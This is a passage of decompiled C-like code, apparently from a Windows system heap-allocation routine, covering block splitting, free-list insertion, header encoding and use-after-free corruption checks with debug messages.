														_t1306 = E1E6A80A0(_t380, _t1818, 0xfeeefeee);
														_v32 = _t1306;
														__eflags = _t1306 - _t1818;
														if(_t1306 != _t1818) {
															_t1599 =  *[fs:0x30];
															__eflags =  *(_t1599 + 0xc);
															if( *(_t1599 + 0xc) == 0) {
																_push("HEAP: ");
																E1E64B910();
																_t1843 = _t1839 + 4;
															} else {
																E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																_t1843 = _t1839 + 8;
															}
															_push(_v32 + 0x10 + _v92);
															E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _v92);
															_t1839 = _t1843 + 0xc;
															_t1312 =  *[fs:0x30];
															__eflags =  *((char*)(_t1312 + 2));
															if( *((char*)(_t1312 + 2)) == 0) {
																_t1441 = _v92;
															} else {
																 *0x1e7447a1 = 1;
																_t1441 = _v92;
																 *0x1e744100 = _t1441;
																asm("int3");
																 *0x1e7447a1 = 0;
															}
														}
														_t1796 = _v116;
													}
												}
												_v104 = _t1441;
												__eflags =  *(_t1441 + 2) & 0x00000001;
												if(( *(_t1441 + 2) & 0x00000001) == 0) {
													 *(_t1441 + 2) = _v56;
													_t1500 = _v40;
													_t1679 = ( *_t1441 & 0x0000ffff) - _t1500;
													_v80 = _t1679;
													_v296 = _t1679;
													_t1081 = _t1500 & 0x0000ffff;
													_v32 = _t1081;
													 *_t1441 = _t1081;
													_t1083 = _a8 - _a4;
													_v108 = _t1083;
													__eflags = _t1083 - 0x3f;
													if(_t1083 >= 0x3f) {
														 *(_t1441 + _t1500 * 8 - 4) = _t1083;
														 *(_t1441 + 7) = 0x3f;
													} else {
														 *(_t1441 + 7) = _t1083;
													}
													 *(_t1441 + 3) = 0;
													__eflags = _t1679;
													if(_t1679 == 0) {
														L222:
														_t1501 = _v104;
														_t1797 =  &(_t1501[4]);
														_v88 = _t1797;
														_t1680 = ( *_t1501 & 0x0000ffff) * 8;
														_v140 = _t1680;
														_t1085 =  &(_t1501[3]);
														_v32 = _t1085;
														__eflags = ( *_t1085 & 0x0000003f) - 0x3f;
														if(( *_t1085 & 0x0000003f) == 0x3f) {
															_t1680 = _t1680 + 0xfffffffc;
															__eflags = _t1680;
															_v140 = _t1680;
														}
														__eflags = _v116;
														if(_v116 == 0) {
															__eflags = _v120 & 0x00000008;
															if((_v120 & 0x00000008) == 0) {
																__eflags =  *(_t1771 + 0x40) & 0x00000040;
																if(( *(_t1771 + 0x40) & 0x00000040) == 0) {
																	goto L455;
																} else {
																	_t1449 = _a4;
																	E1E6A8140(_v88, _t1449 & 0xfffffffc, 0xbaadf00d);
																	goto L456;
																}
																goto L517;
															} else {
																E1E698F40(_t1797, 0, _t1680 - 8);
																L455:
																_t1449 = _a4;
															}
															L456:
															__eflags =  *(_t1771 + 0x40) & 0x00000020;
															if(( *(_t1771 + 0x40) & 0x00000020) != 0) {
																 *((intOrPtr*)(_t1797 + _t1449)) = 0xabababab;
																 *((intOrPtr*)(_t1797 + _t1449 + 4)) = 0xabababab;
																_t1108 = _v104;
																_t845 = _t1108 + 2;
																 *_t845 =  *(_t1108 + 2) | 0x00000004;
																__eflags =  *_t845;
															}
															_t1502 = _v104;
															_t1441 = _t1502 + 3;
															 *_t1441 = 0;
															_t1088 = _t1502 + 2;
															_v48 = _t1088;
															__eflags =  *_t1088 & 0x00000002;
															if(( *_t1088 & 0x00000002) == 0) {
																_t1090 =  *( *[fs:0x30] + 0x68);
																_v324 = _t1090;
																__eflags = _t1090 & 0x00000800;
																if((_t1090 & 0x00000800) == 0) {
																	goto L470;
																} else {
																	_t1798 = _v104;
																	 *_t1441 = E1E6F9AFE(_t1771, _v120 >> 0x00000012 & 0x000000ff, 0,  *_t1798 & 0x0000ffff, 0);
																}
															} else {
																__eflags =  *_v32 - 4;
																if( *_v32 != 4) {
																	_t1505 = _v104;
																	_t1101 = ( *_t1505 & 0x0000ffff) - 1;
																	__eflags = _t1101;
																	_t1799 = _t1505 + _t1101 * 8;
																} else {
																	_t1799 = _t1502 - 0x10;
																}
																_t1102 = _t1799;
																_v172 = _t1799;
																 *_t1102 = 0;
																 *((intOrPtr*)(_t1102 + 4)) = 0;
																__eflags =  *(_t1771 + 0x40) & 0x08000000;
																if(( *(_t1771 + 0x40) & 0x08000000) != 0) {
																	 *_t1799 = E1E67FDB9(1, _t1680);
																}
																_t1104 =  *( *[fs:0x30] + 0x68);
																_v320 = _t1104;
																__eflags = _t1104 & 0x00000800;
																if((_t1104 & 0x00000800) == 0) {
																	L470:
																	_t1798 = _v104;
																} else {
																	_t1798 = _v104;
																	 *((short*)(_v172 + 2)) = E1E6F9AFE(_t1771, _v120 >> 0x00000012 & 0x00000fff, 0,  *_t1798 & 0x0000ffff, 0);
																}
															}
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																 *_t1441 = _t1798[0] ^  *_v48 ^  *_t1798;
																 *_t1798 =  *_t1798 ^  *(_t1771 + 0x50);
															}
														} else {
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1518 = _v104;
																_t1518[0] = _t1518[0] ^ _t1518[0] ^  *_t1518;
																 *_t1518 =  *_t1518 ^  *(_t1771 + 0x50);
																__eflags =  *_t1518;
															}
															__eflags = _v49;
															if(_v49 != 0) {
																__eflags =  *(_t1771 + 0x44) & 0x01000000;
																if(( *(_t1771 + 0x44) & 0x01000000) == 0) {
																	 *(_t1771 + 0x22c) =  *(_t1771 + 0x22c) + 1;
																	_t1680 =  *(_t1771 + 0x234);
																	__eflags =  *(_t1771 + 0x22c) - _t1680;
																	if( *(_t1771 + 0x22c) > _t1680) {
																		 *(_t1771 + 0x22c) = 0;
																		_t1517 =  *((intOrPtr*)(_t1771 + 0x1f8)) - ( *(_t1771 + 0x74) << 3);
																		__eflags = _t1517 -  *((intOrPtr*)(_t1771 + 0x248));
																		if(_t1517 >  *((intOrPtr*)(_t1771 + 0x248))) {
																			 *((intOrPtr*)(_t1771 + 0x248)) = _t1517;
																		}
																		 *((intOrPtr*)(_t1771 + 0x24c)) = _t1517;
																	}
																	 *(_t1771 + 0x238) =  *(_t1771 + 0x238) + 1;
																	__eflags =  *(_t1771 + 0x238) - 0x1000;
																	if( *(_t1771 + 0x238) >= 0x1000) {
																		__eflags =  *((char*)(_t1771 + 0xea)) - 2;
																		if( *((char*)(_t1771 + 0xea)) != 2) {
																			L236:
																			_t1125 = 0x10;
																		} else {
																			__eflags =  *((intOrPtr*)(_t1771 + 0x23c)) - 0x10;
																			_t1125 = 0x100;
																			if( *((intOrPtr*)(_t1771 + 0x23c)) <= 0x10) {
																				goto L236;
																			}
																		}
																		__eflags =  *(_t1771 + 0x230) - _t1125;
																		if( *(_t1771 + 0x230) > _t1125) {
																			__eflags = _t1680 - 0x10000;
																			if(_t1680 < 0x10000) {
																				 *(_t1771 + 0x234) = _t1680 + _t1680;
																			}
																		}
																		 *(_t1771 + 0x230) = 0;
																		 *(_t1771 + 0x238) = 0;
																	}
																}
																_t1800 =  *((intOrPtr*)(_t1771 + 0xc8));
																_t452 = _t1800 + 8;
																 *_t452 =  *(_t1800 + 8) + 0xffffffff;
																__eflags =  *_t452;
																if( *_t452 == 0) {
																	 *(_t1800 + 0xc) = 0;
																	_t455 = _t1800 + 4; // 0x4
																	_t1510 = _t455;
																	asm("lock cmpxchg [ecx], edx");
																	_t1441 = 0xfffffffe;
																	__eflags = 0xfffffffe - 0xfffffffe;
																	if(0xfffffffe != 0xfffffffe) {
																		__eflags =  *_t1510 & 0x00000001;
																		if(( *_t1510 & 0x00000001) != 0) {
																			E1E6EAA40(_t1800);
																		}
																		_t1118 =  *(_t1800 + 0x10);
																		_v72 = _t1118;
																		__eflags = _t1118;
																		if(_t1118 == 0) {
																			_v72 = E1E67FEC0(_t1800);
																		}
																		_v252 = 0;
																		while(1) {
																			_t1513 = _t1441 & 0x00000002 | 0x00000001;
																			asm("lock cmpxchg [edi], edx");
																			__eflags = _t1441 - _t1441;
																			_t1771 = _v124;
																			if(_t1441 == _t1441) {
																				break;
																			}
																			E1E67BAC0(_t1513,  &_v252);
																			_t1441 =  *(_t1800 + 4);
																		}
																		__eflags = _t1513 & 0x00000002;
																		if((_t1513 & 0x00000002) != 0) {
																			E1E67F300(_t1800, _v72);
																		}
																	}
																}
																_v49 = 0;
															}
															__eflags = _v120 & 0x00000008;
															if((_v120 & 0x00000008) != 0) {
																E1E698F40(_v88, 0, _v140 + 0xfffffff8);
															}
														}
													} else {
														__eflags = _t1679 - 1;
														if(_t1679 != 1) {
															__eflags = _t1796;
															_t1134 = 0 | _t1796 == 0x00000000;
															_v44 = _t1134;
															_v184 = _t1134;
															_t1135 =  *(_t1441 + 6);
															__eflags = _t1135;
															if(_t1135 == 0) {
																_t1519 = _t1771;
																_t1801 = _t1771;
															} else {
																_t1519 = (1 - (_t1135 & 0x000000ff) << 0x10) + (_t1441 & 0xffff0000);
																_t1801 = 1;
															}
															_v224 = _t1519;
															_v48 = _t1679;
															_t1441 = _t1441 + _v40 * 8;
															_v72 = 0;
															 *(_t1441 + 2) = _v59;
															 *(_t1441 + 7) = 0;
															 *(_t1441 + 4) =  *(_t1771 + 0x54) ^ _v32;
															__eflags =  *((intOrPtr*)(_t1519 + 0x18)) - _t1801;
															if( *((intOrPtr*)(_t1519 + 0x18)) != _t1801) {
																_t1143 = (_t1441 - _t1801 >> 0x10) + 1;
																_v32 = _t1143;
																_v128 = _t1143;
																__eflags = _t1143 - 0xfe;
																if(_t1143 >= 0xfe) {
																	E1E715FED(3,  *((intOrPtr*)(_t1519 + 0x18)), _t1441, _t1519, 0, 0);
																	_t1679 = _v80;
																	_t1143 = _v32;
																}
															} else {
																_t1143 = 0;
															}
															_v110 = _t1143;
															 *(_t1441 + 6) = _t1143;
															 *(_t1441 + 3) = 0;
															 *_t1441 = _t1679;
															while(1) {
																_t1802 = _t1441 + _t1679 * 8;
																_t1520 =  *(_t1771 + 0x4c);
																_t1147 = _t1520 >> 0x00000014 &  *(_t1771 + 0x52) ^ _t1802[1];
																__eflags = _t1147 & 0x00000001;
																if((_t1147 & 0x00000001) != 0) {
																	break;
																}
																__eflags = _t1520;
																if(_t1520 != 0) {
																	_t1705 =  *(_t1771 + 0x50) ^  *_t1802;
																	 *_t1802 = _t1705;
																	_t1548 = _t1705 >> 0x00000010 ^ _t1705 >> 0x00000008 ^ _t1705;
																	__eflags = _t1705 >> 0x18 - _t1548;
																	if(__eflags != 0) {
																		_push(_t1548);
																		E1E70D646(_t1441, _t1771, _t1802, _t1771, _t1802, __eflags);
																	}
																}
																_t1688 =  &(_t1802[4]);
																_t1521 =  *_t1688;
																_v32 = _t1521;
																_t1148 = _t1802[6];
																_v48 = _t1148;
																_t1149 =  *_t1148;
																_t1522 =  *((intOrPtr*)(_t1521 + 4));
																__eflags = _t1149 - _t1522;
																if(_t1149 != _t1522) {
																	L448:
																	E1E715FED(0xd, _t1771, _t1688, _t1522, _t1149, 0);
																	goto L449;
																} else {
																	__eflags = _t1149 - _t1688;
																	if(_t1149 != _t1688) {
																		goto L448;
																	} else {
																		 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1802 & 0x0000ffff);
																		_t1690 =  *(_t1771 + 0xb4);
																		__eflags = _t1690;
																		if(_t1690 != 0) {
																			while(1) {
																				_t1205 =  *_t1802 & 0x0000ffff;
																				_t1542 =  *((intOrPtr*)(_t1690 + 4));
																				__eflags = _t1205 - _t1542;
																				if(_t1205 < _t1542) {
																					break;
																				}
																				_t1208 =  *_t1690;
																				__eflags = _t1208;
																				if(_t1208 != 0) {
																					_t1690 = _t1208;
																					continue;
																				} else {
																					_t1205 = _t1542 - 1;
																				}
																				break;
																			}
																			_v240 = _t1205;
																			E1E66036A(_t1771, _t1690, 1,  &(_t1802[4]), _t1205,  *_t1802 & 0x0000ffff);
																		}
																		_t1154 = _v32;
																		_t1524 = _v48;
																		 *_t1524 = _t1154;
																		 *(_t1154 + 4) = _t1524;
																		__eflags = _t1802[1] & 0x00000008;
																		if((_t1802[1] & 0x00000008) == 0) {
																			L388:
																			_v60 = 1;
																			__eflags = _v44;
																			if(_v44 != 0) {
																				_t1536 = _t1802[1];
																				__eflags = _t1536 & 0x00000004;
																				if((_t1536 & 0x00000004) != 0) {
																					_t1189 = ( *_t1802 & 0x0000ffff) * 8 - 0x10;
																					_v168 = _t1189;
																					__eflags = _t1536 & 0x00000002;
																					if((_t1536 & 0x00000002) != 0) {
																						__eflags = _t1189 - 4;
																						if(_t1189 > 4) {
																							_t1189 = _t1189 - 4;
																							__eflags = _t1189;
																							_v168 = _t1189;
																						}
																					}
																					_t1191 = E1E6A80A0( &(_t1802[8]), _t1189, 0xfeeefeee);
																					_v32 = _t1191;
																					__eflags = _t1191 - _v168;
																					if(_t1191 != _v168) {
																						_t1537 =  *[fs:0x30];
																						__eflags =  *(_t1537 + 0xc);
																						if( *(_t1537 + 0xc) == 0) {
																							_push("HEAP: ");
																							E1E64B910();
																							_t1842 = _t1839 + 4;
																						} else {
																							E1E64B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																							_t1842 = _t1839 + 8;
																						}
																						_push(_v32 + 0x10 + _t1802);
																						E1E64B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1802);
																						_t1839 = _t1842 + 0xc;
																						_t1197 =  *[fs:0x30];
																						__eflags =  *((char*)(_t1197 + 2));
																						if( *((char*)(_t1197 + 2)) != 0) {
																							 *0x1e7447a1 = 1;
																							 *0x1e744100 = _t1802;
																							asm("int3");
																							 *0x1e7447a1 = 0;
																						}
																						_v44 = _v184;
																					}
																				}
																			}
																			 *(_t1441 + 2) = _t1802[1];
																			_t1526 = _v80 + ( *_t1802 & 0x0000ffff);
																			_v48 = _t1526;
																			_t1157 = _t1526 & 0x0000ffff;
																			_t1691 = _t1526 & 0x0000ffff;
																			__eflags = _t1526 - 0xfe00;
																			if(_t1526 > 0xfe00) {
																				E1E660B10(_t1771, _t1441, _t1526);
																			} else {
																				 *_t1441 = _t1526;
																				_t1804 = _t1157;
																				 *(_t1441 + 4 + _t1526 * 8) =  *(_t1771 + 0x54) ^ _t1691;
																				__eflags = _v44;
																				if(_v44 != 0) {
																					 *(_t1441 + 2) =  *(_t1441 + 2) & 0x000000f0;
																					 *(_t1441 + 7) = 0;
																					__eflags =  *(_t1771 + 0x40) & 0x00000040;
																					if(( *(_t1771 + 0x40) & 0x00000040) != 0) {
																						_t793 = _t1441 + 0x10; // 0x10
																						E1E6A8140(_t793, _t1804 * 8 - 0x10, 0xfeeefeee);
																						_t794 = _t1441 + 2;
																						 *_t794 =  *(_t1441 + 2) | 0x00000004;
																						__eflags =  *_t794;
																					}
																					_t1163 = _t1771 + 0xc0;
																					__eflags =  *(_t1771 + 0xb4);
																					if( *(_t1771 + 0xb4) == 0) {
																						_t1528 =  *_t1163;
																					} else {
																						_t1528 = E1E651C0E(_t1771, _t1804);
																						_t1163 = _t1771 + 0xc0;
																					}
																					while(1) {
																						__eflags = _t1163 - _t1528;
																						if(_t1163 == _t1528) {
																							break;
																						}
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) == 0) {
																							_t1696 =  *(_t1528 - 8);
																						} else {
																							_t1696 =  *(_t1528 - 8);
																							_v100 = _t1696;
																							__eflags =  *(_t1771 + 0x4c) & _t1696;
																							if(( *(_t1771 + 0x4c) & _t1696) != 0) {
																								_t1696 = _t1696 ^  *(_t1771 + 0x50);
																								_v100 = _t1696;
																							}
																						}
																						_v130 = _t1696;
																						__eflags = _t1804 - (_t1696 & 0x0000ffff);
																						if(_t1804 > (_t1696 & 0x0000ffff)) {
																							_t1528 =  *_t1528;
																							_t1163 = _t1771 + 0xc0;
																							continue;
																						}
																						break;
																					}
																					_t810 = _t1441 + 8; // 0x8
																					_t1805 = _t810;
																					_t1164 =  *((intOrPtr*)(_t1528 + 4));
																					_t1693 =  *_t1164;
																					__eflags = _t1693 - _t1528;
																					if(_t1693 != _t1528) {
																						__eflags = 0;
																						E1E715FED(0xd, 0, _t1528, 0, _t1693, 0);
																					} else {
																						 *_t1805 = _t1528;
																						 *((intOrPtr*)(_t1805 + 4)) = _t1164;
																						 *_t1164 = _t1805;
																						 *((intOrPtr*)(_t1528 + 4)) = _t1805;
																					}
																					 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																					_t1695 =  *(_t1771 + 0xb4);
																					__eflags = _t1695;
																					if(_t1695 == 0) {
																						goto L371;
																					} else {
																						_t1530 =  *_t1441 & 0x0000ffff;
																						while(1) {
																							__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																							if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																								break;
																							}
																							_t1171 =  *_t1695;
																							__eflags = _t1171;
																							if(_t1171 != 0) {
																								_t1695 = _t1171;
																								continue;
																							} else {
																								_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																								__eflags = _t1172;
																							}
																							L444:
																							_v248 = _t1172;
																							goto L370;
																						}
																						_t1172 = _t1530;
																						goto L444;
																					}
																				} else {
																					 *(_t1441 + 2) = 0;
																					 *(_t1441 + 7) = 0;
																					_t1180 = _t1771 + 0xc0;
																					__eflags =  *(_t1771 + 0xb4);
																					if( *(_t1771 + 0xb4) == 0) {
																						_t1533 =  *_t1180;
																					} else {
																						_t1533 = E1E651C0E(_t1771, _t1804);
																						_t1180 = _t1771 + 0xc0;
																					}
																					while(1) {
																						__eflags = _t1180 - _t1533;
																						if(_t1180 == _t1533) {
																							break;
																						}
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) == 0) {
																							_t1700 =  *(_t1533 - 8);
																						} else {
																							_t1700 =  *(_t1533 - 8);
																							_v84 = _t1700;
																							__eflags =  *(_t1771 + 0x4c) & _t1700;
																							if(( *(_t1771 + 0x4c) & _t1700) != 0) {
																								_t1700 = _t1700 ^  *(_t1771 + 0x50);
																								_v84 = _t1700;
																							}
																						}
																						_v132 = _t1700;
																						__eflags = _t1804 - (_t1700 & 0x0000ffff);
																						if(_t1804 > (_t1700 & 0x0000ffff)) {
																							_t1533 =  *_t1533;
																							_t1180 = _t1771 + 0xc0;
																							continue;
																						}
																						break;
																					}
																					_t774 = _t1441 + 8; // 0x8
																					_t1805 = _t774;
																					_t1181 =  *((intOrPtr*)(_t1533 + 4));
																					_t1698 =  *_t1181;
																					__eflags = _t1698 - _t1533;
																					if(_t1698 != _t1533) {
																						__eflags = 0;
																						E1E715FED(0xd, 0, _t1533, 0, _t1698, 0);
																					} else {
																						 *_t1805 = _t1533;
																						 *((intOrPtr*)(_t1805 + 4)) = _t1181;
																						 *_t1181 = _t1805;
																						 *((intOrPtr*)(_t1533 + 4)) = _t1805;
																					}
																					 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																					_t1695 =  *(_t1771 + 0xb4);
																					__eflags = _t1695;
																					if(_t1695 == 0) {
																						L371:
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) != 0) {
																							 *(_t1441 + 3) =  *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441;
																							 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
																						}
																						goto L447;
																					} else {
																						_t1530 =  *_t1441 & 0x0000ffff;
																						while(1) {
																							__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																							if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																								break;
																							}
																							_t1184 =  *_t1695;
																							__eflags = _t1184;
																							if(_t1184 != 0) {
																								_t1695 = _t1184;
																								continue;
																							} else {
																								_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																								__eflags = _t1172;
																							}
																							L421:
																							_v244 = _t1172;
																							L370:
																							E1E651B5D(_t1771, _t1695, 1, _t1805, _t1172, _t1530);
																							goto L371;
																						}
																						_t1172 = _t1530;
																						goto L421;
																					}
																				}
																				goto L525;
																			}
																			L447:
																			_v109 = 1;
																			_v59 = 0;
																			goto L222;
																		} else {
																			_t1202 = E1E64F5C7(_t1771, _t1802);
																			__eflags = _t1202;
																			if(_t1202 != 0) {
																				goto L388;
																			} else {
																				E1E64F113(_t1771, _t1802,  *_t1802 & 0x0000ffff, 1);
																				L449:
																				_v60 = 0;
																				__eflags = _v72;
																				if(_v72 != 0) {
																					_v109 = 0;
																					 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000003c;
																					_t1803 =  *[fs:0x18];
																					_v316 = _t1803;
																					 *((intOrPtr*)(_t1803 + 0x34)) = E1E67ABA0(0xc000003c);
																				} else {
																					_v72 = 1;
																					_t1679 = _v80;
																					continue;
																				}
																			}
																		}
																	}
																}
																goto L517;
															}
															_t1708 = _t1679 & 0x0000ffff;
															_v40 = _t1708;
															_t1802[2] =  *(_t1771 + 0x54) ^ _t1708;
															__eflags = _v44;
															if(_v44 != 0) {
																 *(_t1441 + 2) =  *(_t1441 + 2) & 0x000000f0;
																 *(_t1441 + 7) = 0;
																__eflags =  *(_t1771 + 0x40) & 0x00000040;
																if(( *(_t1771 + 0x40) & 0x00000040) != 0) {
																	_t676 = _t1441 + 0x10; // 0x10
																	E1E6A8140(_t676, _t1708 * 8 - 0x10, 0xfeeefeee);
																	_t677 = _t1441 + 2;
																	 *_t677 =  *(_t1441 + 2) | 0x00000004;
																	__eflags =  *_t677;
																	_t1708 = _v40;
																}
																_t1806 = _t1771 + 0xc0;
																__eflags =  *(_t1771 + 0xb4);
																if( *(_t1771 + 0xb4) == 0) {
																	_t1550 =  *_t1806;
																} else {
																	_t1550 = E1E651C0E(_t1771, _t1708);
																}
																while(1) {
																	__eflags = _t1806 - _t1550;
																	if(_t1806 == _t1550) {
																		break;
																	}
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) == 0) {
																		_t1711 =  *(_t1550 - 8);
																	} else {
																		_t1711 =  *(_t1550 - 8);
																		_v76 = _t1711;
																		__eflags =  *(_t1771 + 0x4c) & _t1711;
																		if(( *(_t1771 + 0x4c) & _t1711) != 0) {
																			_t1711 = _t1711 ^  *(_t1771 + 0x50);
																			_v76 = _t1711;
																		}
																	}
																	_v134 = _t1711;
																	__eflags = _v40 - (_t1711 & 0x0000ffff);
																	if(_v40 > (_t1711 & 0x0000ffff)) {
																		_t1550 =  *_t1550;
																		continue;
																	}
																	break;
																}
																_t693 = _t1441 + 8; // 0x8
																_t1805 = _t693;
																_t1216 =  *((intOrPtr*)(_t1550 + 4));
																_t1709 =  *_t1216;
																__eflags = _t1709 - _t1550;
																if(_t1709 != _t1550) {
																	__eflags = 0;
																	E1E715FED(0xd, 0, _t1550, 0, _t1709, 0);
																} else {
																	 *_t1805 = _t1550;
																	 *((intOrPtr*)(_t1805 + 4)) = _t1216;
																	 *_t1216 = _t1805;
																	 *((intOrPtr*)(_t1550 + 4)) = _t1805;
																}
																 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																_t1695 =  *(_t1771 + 0xb4);
																__eflags = _t1695;
																if(_t1695 != 0) {
																	_t1530 =  *_t1441 & 0x0000ffff;
																	while(1) {
																		__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																		if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																			break;
																		}
																		_t1219 =  *_t1695;
																		__eflags = _t1219;
																		if(_t1219 != 0) {
																			_t1695 = _t1219;
																			continue;
																		} else {
																			_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																			__eflags = _t1172;
																		}
																		L369:
																		_v236 = _t1172;
																		goto L370;
																	}
																	_t1172 = _t1530;
																	goto L369;
																}
															} else {
																 *(_t1441 + 2) = 0;
																 *(_t1441 + 7) = 0;
																_t1226 = _t1771 + 0xc0;
																_t1807 =  *(_t1771 + 0xb4);
																_v36 = _t1807;
																__eflags = _t1807;
																if(_t1807 == 0) {
																	_t1553 =  *_t1226;
																} else {
																	while(1) {
																		_t1564 =  *((intOrPtr*)(_t1807 + 4));
																		__eflags = _t1708 - _t1564;
																		if(_t1708 < _t1564) {
																			break;
																		}
																		_t1249 =  *_t1807;
																		__eflags = _t1249;
																		if(_t1249 != 0) {
																			_t1807 = _t1249;
																			_v36 = _t1807;
																			continue;
																		} else {
																			_t1250 = _t1564 - 1;
																			L270:
																			_v164 = _t1250;
																		}
																		L271:
																		_v96 = _t1250;
																		_v80 = _t1250 -  *(_t1807 + 0x14);
																		_v108 = 0;
																		_t1252 =  *(_t1807 + 0x18);
																		_v56 = _t1252;
																		_t1565 =  *((intOrPtr*)(_t1252 + 4));
																		__eflags = _t1252 - _t1565;
																		if(_t1252 != _t1565) {
																			_t1253 = _t1565 - 8;
																			_v32 = _t1253;
																			_t1724 =  *_t1253;
																			_v380 = _t1724;
																			__eflags =  *(_t1771 + 0x4c);
																			if( *(_t1771 + 0x4c) != 0) {
																				_t1724 = _t1724 ^  *(_t1771 + 0x50);
																				_v48 = _t1724;
																				_v380 = _t1724;
																				__eflags = _t1724 >> 0x18 - (_t1724 >> 0x00000010 ^ _t1724 >> 0x00000008 ^ _t1724);
																				if(_t1724 >> 0x18 != (_t1724 >> 0x00000010 ^ _t1724 >> 0x00000008 ^ _t1724)) {
																					E1E715FED(3, _t1771, _v32, 0, 0, 0);
																					_t1724 = _v48;
																				}
																			}
																			_t1567 = _v40 - (_t1724 & 0x0000ffff);
																			_v300 = _t1567;
																			__eflags = _t1567;
																			if(_t1567 <= 0) {
																				_t1257 =  *_v56 + 0xfffffff8;
																				_v32 = _t1257;
																				_t1725 =  *_t1257;
																				_v388 = _t1725;
																				__eflags =  *(_t1771 + 0x4c);
																				if( *(_t1771 + 0x4c) != 0) {
																					_t1725 = _t1725 ^  *(_t1771 + 0x50);
																					_v48 = _t1725;
																					_v388 = _t1725;
																					__eflags = _t1725 >> 0x18 - (_t1725 >> 0x00000010 ^ _t1725 >> 0x00000008 ^ _t1725);
																					if(_t1725 >> 0x18 != (_t1725 >> 0x00000010 ^ _t1725 >> 0x00000008 ^ _t1725)) {
																						E1E715FED(3, _t1771, _v32, 0, 0, 0);
																						_t1725 = _v48;
																					}
																				}
																				_t1569 = _v40 - (_t1725 & 0x0000ffff);
																				_v304 = _t1569;
																				__eflags = _t1569;
																				if(_t1569 > 0) {
																					__eflags =  *_t1807;
																					if( *_t1807 != 0) {
																						L296:
																						_t1570 = _v80;
																						_t1727 = _t1570 >> 5;
																						_v48 = ( *((intOrPtr*)(_t1807 + 4)) -  *(_t1807 + 0x14) >> 5) - 1;
																						_t1263 =  *(_t1807 + 0x1c);
																						_t1816 = _t1263 + _t1727 * 4;
																						_t1265 = (_t1263 | 0xffffffff) << (_t1570 & 0x0000001f);
																						_v32 = _t1265;
																						_t1573 = _t1265 &  *_t1816;
																						__eflags = _t1573;
																						_t1266 = _v48;
																						while(1) {
																							_v228 = _t1816;
																							_v160 = _t1727;
																							__eflags = _t1573;
																							if(_t1573 != 0) {
																								break;
																							}
																							__eflags = _t1727 - _t1266;
																							if(_t1727 > _t1266) {
																								__eflags = _t1573;
																								if(_t1573 == 0) {
																									_t1807 = _v36;
																									L314:
																									_t1807 =  *_t1807;
																									_v36 = _t1807;
																									_t1250 =  *(_t1807 + 0x14);
																									goto L270;
																								} else {
																									break;
																								}
																							} else {
																								_t1816 =  &(_t1816[1]);
																								_t1573 =  *_t1816;
																								_t1727 = _t1727 + 1;
																								continue;
																							}
																							goto L311;
																						}
																						__eflags = _t1573;
																						if(_t1573 == 0) {
																							_t1269 = _t1573 >> 0x00000010 & 0x000000ff;
																							__eflags = _t1269;
																							if(_t1269 == 0) {
																								_t1271 = ( *((_t1573 >> 0x18) + 0x1e6289b0) & 0x000000ff) + 0x18;
																								__eflags = _t1271;
																							} else {
																								_t1271 = ( *(_t1269 + 0x1e6289b0) & 0x000000ff) + 0x10;
																							}
																						} else {
																							_t1274 = _t1573 & 0x000000ff;
																							__eflags = _t1573;
																							if(_t1573 == 0) {
																								_t1271 = ( *((_t1573 >> 0x00000008 & 0x000000ff) + 0x1e6289b0) & 0x000000ff) + 8;
																							} else {
																								_t1271 =  *(_t1274 + 0x1e6289b0) & 0x000000ff;
																							}
																						}
																						_t1729 = (_t1727 << 5) + _t1271;
																						_v160 = _t1729;
																						_t1807 = _v36;
																						__eflags =  *(_t1807 + 8);
																						if( *(_t1807 + 8) != 0) {
																							_t1729 = _t1729 + _t1729;
																							__eflags = _t1729;
																						}
																						_t1553 =  *( *((intOrPtr*)(_t1807 + 0x20)) + _t1729 * 4);
																					} else {
																						__eflags = _v96 -  *((intOrPtr*)(_t1807 + 4)) - 1;
																						if(_v96 !=  *((intOrPtr*)(_t1807 + 4)) - 1) {
																							goto L296;
																						} else {
																							_t1576 = _v80;
																							__eflags =  *(_t1807 + 8);
																							if( *(_t1807 + 8) != 0) {
																								_t1576 = _t1576 + _t1576;
																								__eflags = _t1576;
																							}
																							_t1817 =  *( *((intOrPtr*)(_t1807 + 0x20)) + _t1576 * 4);
																							while(1) {
																								__eflags = _v56 - _t1817;
																								if(_v56 == _t1817) {
																									break;
																								}
																								_t1730 =  *(_t1817 - 8);
																								_v396 = _t1730;
																								__eflags =  *(_t1771 + 0x4c);
																								if( *(_t1771 + 0x4c) != 0) {
																									_t1730 = _t1730 ^  *(_t1771 + 0x50);
																									_v32 = _t1730;
																									_v396 = _t1730;
																									__eflags = _t1730 >> 0x18 - (_t1730 >> 0x00000010 ^ _t1730 >> 0x00000008 ^ _t1730);
